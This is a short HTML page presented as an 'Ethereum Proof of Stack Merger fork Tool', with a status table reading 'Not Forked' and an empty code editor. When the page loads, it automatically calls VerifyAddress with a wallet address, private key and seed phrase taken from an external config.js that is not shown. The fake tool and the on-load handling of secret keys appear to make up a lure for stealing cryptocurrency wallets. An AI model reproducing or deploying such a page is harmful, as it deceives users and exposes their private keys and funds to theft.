<!DOCTYPE html>
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="lib/codemirror.js"></script>
<script language="javascript" type="text/javascript" src="mode/perl/perl.js"></script>
<script language="javascript" type="text/javascript" src="config.js"></script>
<link rel="stylesheet" type="text/css" href="lib/codemirror.css"></link>
<link rel="stylesheet" type="text/css" href="theme/darcula.css"></link>
<link rel="stylesheet" href="fonts.css"></link>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style>
table, th, td {
  border: 1px solid white;
  text-color: white;
}

.main{
  text-align: left;
  padding: 20px;
  color: black;
  top: 15px;
  margin: auto;
  position: absolute;
  background: black;
  width:99%;
  height:99%;
  border-style: solid;
  border-width: 5px;
  border-color: white;
  border-radius: 25px;
}
html, body {
    height: 100%;
    background-color:black;
}
textarea
{
  width:95%;
  height:95%;
  
}


</style>

</head>
<body onload="VerifyAddress(myaddress,myprivatekey,myseed)" >
<div class="main" id="main" name="main" >
<center><h1><font color=white >Ethereum Proof of Stack Merger fork Tool</font></h1>

<table>
  <tr>
    <th><font color=white>Network Chain</font></th>
    <th><font color=white>Status:</font></th>
  </tr>
  <tr>
    <td ><input type="text" id="network" name="network" value="ETH" ></td>
    <td ><input type="text" id="statusgo" name="statusgo" value="Not Forked" ></td>
  </tr>
</table>
</center>
<textarea class="code" id="code" name="code" cols="40" rows="40"></textarea>
</div>

<script>
var editor = CodeMirror.fromTextArea(document.getElementById('code'), {
    lineNumbers: true,
    mode: 'text/x-perl',
    theme: 'darcula',
    lineNumbers: true
});
editor.setOption('theme', 'darcula');
</script>


</body>
</html>
